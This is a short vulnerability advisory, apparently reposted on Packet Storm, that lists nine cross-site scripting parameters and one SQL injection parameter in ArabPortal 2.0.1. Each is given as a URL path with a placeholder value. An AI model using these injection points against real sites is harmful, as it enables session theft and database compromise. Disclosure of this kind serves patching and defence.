ArabPortal 2.0.1 Stable suffers from several XSS and SQL injection vulnerabilities.
ec8f2f439932a33c36f4fdb82c0b876c8309e2923328e74b5bc9f1b62153c804ArabPortal Bugs :-
ArabPortal 2.0.1 Stable [ 9 CrossSiteScripting & 1 SQL Injection ] MultBugz
BugTraqz :- D3vil-0x1 | Devil-00
Visit Palestine :- www.palestineonly.com
/*
1- /forum.php?action=view&id=1&cat_id=3&adminJump=D3vil-0x1[HTML - XSS ]
2- /forum.php?action=view&id=1&cat_id=3&forum_middle=D3vil-0x1[HTML - XSS ]
//*
3- /forum.php?mineID=[SQL Injection]
*//
4- /members.php?action=changepass&form=D3vil-0x1[HTML - XSS ]
5- /members.php?action=edit&form=D3vil-0x1[HTML - XSS ]
6- /pm.php?action=reply&form=D3vil-0x1[HTML - XSS ]
7- /pm.php?action=sendmsg&form=D3vil-0x1[HTML - XSS ]
8- /mail.php?action=sendpage&form=D3vil-0x1[HTML - XSS ]
9- /mail.php?action=sendtome&form=D3vil-0x1[HTML - XSS ]
10- /mail.php?action=sendtousers&userid=1&form=D3vil-0x1[HTML - XSS ]
*/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed